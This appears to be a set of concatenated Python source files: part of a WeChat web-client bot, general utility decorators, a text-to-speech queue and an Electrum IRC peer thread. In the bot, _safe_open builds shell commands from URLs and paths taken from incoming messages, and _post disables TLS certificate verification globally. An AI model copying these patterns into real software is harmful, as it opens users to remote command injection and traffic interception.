data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# 计数器
self.media_count = self.media_count + 1
# 文件名
file_name = image_name
# MIME格式
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# 微信识别的文档格式,微信服务器应该只支持两种类型的格式。pic和doc
# pic格式,直接显示。doc格式则显示为文件。
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# 上一次修改日期
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# 文件大小
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print(json.dumps(dic, indent=4))
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
logging.info("webwxgetmsgimg url :" + url)
data = self._get(url,"webwxgetmsgimg")
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvoice')
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# 现有群里面查不到
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
# 群
name = self.getGroupName(id)
else:
# 特殊账号
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 公众号或服务号
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 直接联系人
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 群友
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content)
if data == '':
return
data.decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
temp = self._get(content)
if temp == '':
return
tree = html.fromstring(temp)
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if ":<br/>" in content:
[people, content] = content.split(':<br/>', 1)
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in list(msg.keys()):
content = msg['message']
if groupName != None:
print('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print('%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleMsg(self, r):
for msg in r['AddMsgList']:
print('[*] 你有新的消息,请注意查收')
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print('[*] 该消息已储存到文件: ' + fn)
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = autoReply(content)+ ' -- [微信机器人自动回复]'
logging.info("autoreply " + ans)
if self.webwxsendmsg(ans, msg['FromUserName']):
print('自动回复: ' + ans)
logging.info('自动回复: ' + ans)
else:
print('自动回复失败')
logging.info('自动回复失败')
elif msgType == 3:
image = self.webwxgetmsgimg(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发送了一张图片: %s' % (name, image)}
self._showMsg(raw_msg)
self._safe_open(image)
elif msgType == 34:
voice = self.webwxgetvoice(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段语音: %s' % (name, voice)}
self._showMsg(raw_msg)
self._safe_open(voice)
elif msgType == 42:
info = msg['RecommendInfo']
print('%s 发送了一张名片:' % name)
print('=========================')
print('= 昵称: %s' % info['NickName'])
print('= 微信号: %s' % info['Alias'])
print('= 地区: %s %s' % (info['Province'], info['City']))
print('= 性别: %s' % ['未知', '男', '女'][info['Sex']])
print('=========================')
raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
name.strip(), json.dumps(info))}
self._showMsg(raw_msg)
elif msgType == 47:
url = self._searchContent('cdnurl', content)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
self._showMsg(raw_msg)
self._safe_open(url)
elif msgType == 49:
appMsgType = defaultdict(lambda: "")
appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
print('%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']]))
print('=========================')
print('= 标题: %s' % msg['FileName'])
print('= 描述: %s' % self._searchContent('des', content, 'xml'))
print('= 链接: %s' % msg['Url'])
print('= 来自: %s' % self._searchContent('appname', content, 'xml'))
print('=========================')
card = {
'title': msg['FileName'],
'description': self._searchContent('des', content, 'xml'),
'url': msg['Url'],
'appname': self._searchContent('appname', content, 'xml')
}
raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
name, appMsgType[msg['AppMsgType']], json.dumps(card))}
self._showMsg(raw_msg)
elif msgType == 51:
raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
self._showMsg(raw_msg)
elif msgType == 62:
video = self.webwxgetvideo(msgid)
raw_msg = {'raw_msg': msg,
'message': '%s 发了一段小视频: %s' % (name, video)}
self._showMsg(raw_msg)
self._safe_open(video)
elif msgType == 10002:
raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
self._showMsg(raw_msg)
else:
logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
(msg['MsgType'], json.dumps(msg)))
raw_msg = {
'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
self._showMsg(raw_msg)
def listenMsgMode(self):
print('[*] 进入消息监听模式 ... 成功')
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
# if self.DEBUG:
# print('retcode: %s, selector: %s' % (retcode, selector))
# logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print('[*] 你在手机上登出了微信,债见')
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print('[*] 你在其他地方登录了 WEB 版微信,债见')
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
# elif selector == '3':
# r = self.webwxsync()
# if r is not None:
# self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print('[*] 收到疑似红包消息 %d 次' % redEnvelope)
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
elif selector == '7':
playWeChat += 1
print('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print(' [成功]')
else:
print(' [失败]')
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print('[*] 消息发送成功')
logging.debug('[*] 消息发送成功')
else:
print('[*] 消息发送失败')
logging.debug('[*] 消息发送失败')
else:
print('[*] 此用户不存在')
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print(' [成功]')
else:
print(' [失败]')
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
@catchKeyboardInterrupt
def start(self):
self._echo('[*] 微信网页版 ... 开动')
print()
logging.debug('[*] 微信网页版 ... 开动')
while True:
self._run('[*] 正在获取 uuid ... ', self.getUUID)
self._echo('[*] 正在获取二维码 ... 成功')
print()
logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print('[*] 请使用微信扫描二维码以登录 ... ')
if not self.waitForLogin():
continue
print('[*] 请在手机上点击确认以登录 ... ')
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print()
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print()
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
# if self.DEBUG:
# print(self)
# logging.debug(self)
if self.interactive and input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print('[*] 自动回复模式 ... 开启')
logging.debug('[*] 自动回复模式 ... 开启')
else:
print('[*] 自动回复模式 ... 关闭')
logging.debug('[*] 自动回复模式 ... 关闭')
if sys.platform.startswith('win'):
import _thread
_thread.start_new_thread(self.listenMsgMode())
else:
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print('发送文件')
logging.debug('发送文件')
elif text[:3] == 'i->':
print('发送图片')
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print('发送表情')
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print('成功')
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print(''.join([BLACK if j else WHITE for j in i]))
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_ascii(invert=True)
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == str:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url: object, api: object = None, timeout: object = None) -> object:
request = urllib.request.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetmsgimg':
request.add_header('Range', 'bytes=0-')
try:
# 在最近一次测试发现,图片utf-8 decode不了
response = urllib.request.urlopen(request, timeout=timeout) if timeout else urllib.request.urlopen(request)
if api == 'webwxgetvoice' or api == 'webwxgetvideo' or api == 'webwxgetmsgimg':
data = response.read()
else:
data = response.read().decode('utf-8')
# logging.debug(url)
return data
except urllib.error.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
except http.client.HTTPException as e:
logging.error('HTTPException')
except timeout_error as e:
pass
except ssl.CertificateError as e:
pass
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _post(self, url: object, params: object, jsonfmt: object = True) -> object:
# 本机证书校验不通过,去除证书校验
ssl._create_default_https_context = ssl._create_unverified_context
if jsonfmt:
data = (json.dumps(params)).encode()
request = urllib.request.Request(url=url, data=data)
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib.request.Request(url=url, data=urllib.parse.urlencode(params).encode(encoding='utf-8'))
try:
response = urllib.request.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data.decode('utf-8') )#object_hook=_decode_dict)
return data
except urllib.error.HTTPError as e:
logging.error('HTTPError = ' + str(e.code))
except urllib.error.URLError as e:
logging.error('URLError = ' + str(e.reason))
except http.client.HTTPException as e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.encode().decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
misc.py
|
import os
import sys
import linecache
import functools
import io
from threading import Thread
from . import logger
class TimeoutError(Exception):
pass
def timeout(seconds, error_message='Time out'):
def decorated(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
share = [TimeoutError(error_message)]
def func_with_except():
try:
share[0] = func(*args, **kwargs)
except Exception as e:
share[0] = e
t = Thread(target=func_with_except)
t.daemon = True
try:
t.start()
t.join(seconds)
except Exception as e:
logger.error('Starting timeout thread for %s error', e)
raise e
result = share[0]
if isinstance(result, BaseException):
raise result
return result
return wrapper
return decorated
def trace(f): # pragma: no cover
def globaltrace(frame, why, arg):
if why == 'call':
return localtrace
return None
def localtrace(frame, why, arg):
if why == 'line':
# record the file name and line number of every trace
filename = frame.f_code.co_filename
lineno = frame.f_lineno
bname = os.path.basename(filename)
print('{}({}): {}\n'.format(
bname,
lineno,
linecache.getline(filename, lineno).strip('\r\n')))
return localtrace
def _f(*args, **kwds):
try:
sys.settrace(globaltrace)
result = f(*args, **kwds)
return result
finally:
sys.settrace(None)
return _f
# https://github.com/giampaolo/psutil/blob/master/psutil/_common.py
def memoize(fun):
"""
A simple memoize decorator for functions supporting (hashable)
positional arguments.
It also provides a cache_clear() function for clearing the cache:
>>> @memoize
... def foo()
... return 1
...
>>> foo()
1
>>> foo.cache_clear()
>>>
"""
@functools.wraps(fun)
def wrapper(*args, **kwargs):
key = (args, frozenset(sorted(kwargs.items())))
try:
return cache[key]
except KeyError:
ret = cache[key] = fun(*args, **kwargs)
return ret
def cache_clear():
"""Clear cache."""
cache.clear()
cache = {}
wrapper.cache_clear = cache_clear
return wrapper
# https://github.com/giampaolo/psutil/blob/master/psutil/_common.py
def memoize_when_activated(fun):
"""
A memoize decorator which is disabled by default. It can be
activated and deactivated on request.
For efficiency reasons it can be used only against class methods
accepting no arguments.
>>> class Foo:
... @memoize
... def foo()
... print(1)
...
>>> f = Foo()
>>> # deactivated (default)
>>> foo()
1
>>> foo()
1
>>>
>>> # activated
>>> foo.cache_activate()
>>> foo()
1
>>> foo()
>>> foo()
>>>
"""
@functools.wraps(fun)
def wrapper(self):
if not wrapper.cache_activated:
return fun(self)
else:
try:
ret = cache[fun]
except KeyError:
ret = cache[fun] = fun(self)
return ret
def cache_activate():
"""Activate cache."""
wrapper.cache_activated = True
def cache_deactivate():
"""Deactivate and clear cache."""
wrapper.cache_activated = False
cache.clear()
cache = {}
wrapper.cache_activated = False
wrapper.cache_activate = cache_activate
wrapper.cache_deactivate = cache_deactivate
return wrapper
# https://github.com/requests/requests/blob/master/requests/utils.py
def super_len(obj):
total_length = None
current_position = 0
if hasattr(obj, '__len__'):
total_length = len(obj)
elif hasattr(obj, 'len'):
total_length = obj.len
elif hasattr(obj, 'fileno'):
try:
fileno = obj.fileno()
except io.UnsupportedOperation:
pass
else:
total_length = os.fstat(fileno).st_size
if hasattr(obj, 'tell'):
try:
current_position = obj.tell()
except (OSError, IOError):
# This can happen in some weird situations, such as when the file
# is actually a special file descriptor like stdin. In this
# instance, we don't know what the length is, so set it to zero and
# let requests chunk it instead.
if total_length is not None:
current_position = total_length
else:
if hasattr(obj, 'seek') and total_length is None:
# StringIO and BytesIO have seek but no useable fileno
try:
# seek to end of file
obj.seek(0, 2)
total_length = obj.tell()
# seek back to current position to support
# partially read file-like objects
obj.seek(current_position or 0)
except (OSError, IOError):
total_length = 0
if total_length is None:
total_length = 0
return max(0, total_length - current_position)
|
tts.py
|
from __future__ import annotations
from typing import Callable, List, Tuple
from queue import Queue
import threading
import time
import accessible_output2.outputs.auto
from .log import warning, exception
class _TTS:
_end_time = None
def __init__(self, wait_delay_per_character):
self.o = accessible_output2.outputs.auto.Auto()
self._wait_delay_per_character = wait_delay_per_character
def IsSpeaking(self):
if self._end_time is None:
return False
else:
return self._end_time > time.time()
def Speak(self, text):
self.o.output(text, interrupt=True)
self._end_time = time.time() + len(text) * self._wait_delay_per_character
def Stop(self):
self.o.output("", interrupt=True)
self._end_time = None
_tts = None
_is_speaking = False
_queue: Queue[Tuple[Callable, List]] = Queue()
def is_speaking():
return _is_speaking
def _speak(text):
with _lock:
try:
_tts.Speak(text)
except:
exception("error during _tts.Speak('%s')", text)
def speak(text: str):
global _is_speaking
assert isinstance(text, str)
_queue.put((_speak, [text]))
_is_speaking = True
def _stop():
with _lock:
if _is_speaking:
try:
_tts.Stop()
except:
pass # speak() will have a similar error and fall back to sounds
def stop():
global _is_speaking
_queue.put((_stop, []))
_is_speaking = False
def _loop():
while(True):
cmd, args = _queue.get()
if not _queue.empty():
#print("skipped!", cmd, args)
continue
try:
cmd(*args)
except:
exception("")
def _loop2():
global _is_speaking
while(True):
if _is_speaking:
time.sleep(.1)
with _lock:
if not _tts.IsSpeaking():
_is_speaking = False
time.sleep(.1)
def init(wait_delay_per_character):
global _tts, _lock
_lock = threading.Lock()
_tts = _TTS(wait_delay_per_character)
t = threading.Thread(target=_loop)
t.daemon = True
t.start()
t = threading.Thread(target=_loop2)
t.daemon = True
t.start()
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2021 CryptoLover705
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'ELEC_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-xvg")
def on_join(self, connection, event):
m = re.match("(ELEC_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(ELEC_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(ELEC_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
